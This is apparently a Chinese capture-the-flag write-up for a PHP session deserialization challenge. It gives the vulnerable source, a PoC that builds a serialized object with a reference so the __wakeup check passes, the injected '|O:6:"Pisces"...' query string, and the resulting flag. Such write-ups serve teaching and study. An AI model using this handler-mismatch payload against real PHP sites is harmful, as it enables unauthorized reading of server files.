源码
<?php
error_reporting(0);
session_start();
class Pisces
{
public $romance;
public $fantasy;
function __wakeup()
{
printf("%s\n", __METHOD__);
$this->fantasy = md5(rand(1, 10000));
if ($this->romance === $this->fantasy) {
echo file_get_contents('/flag');
}
}
}
|
查看提示
<?php
error_reporting(0);
ini_set('session.serialize_handler', 'php_serialize');
session_start();
if (isset($_REQUEST['Pisces'])) {
$_SESSION['Pisces'] = $_REQUEST['Pisces'];
} else {
echo "系统检测发现该处漏洞,进行攻击测试\n";
}
?>
|
POC
<?php
class Pisces
{
public $romance;
public $fantasy;
}
$pisces = new Pisces();
$pisces->romance = &$pisces->fantasy;
echo serialize($pisces);
|
/post/session.php?Pisces=|O:6:"Pisces":2:{s:7:"romance";N;s:7:"fantasy";R:2;}
|
session.php传参后返回首页,session处理器会反序列化`|`后的内容,触发wakup
|
得到
Pisces::__wakeup
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
|
参考:https://www.yuque.com/shiyizhesonder/sonder39/nfvx411pp209arek
https://www.yuque.com/shiyizhesonder/sonder39/awxqal5aynlm14p2
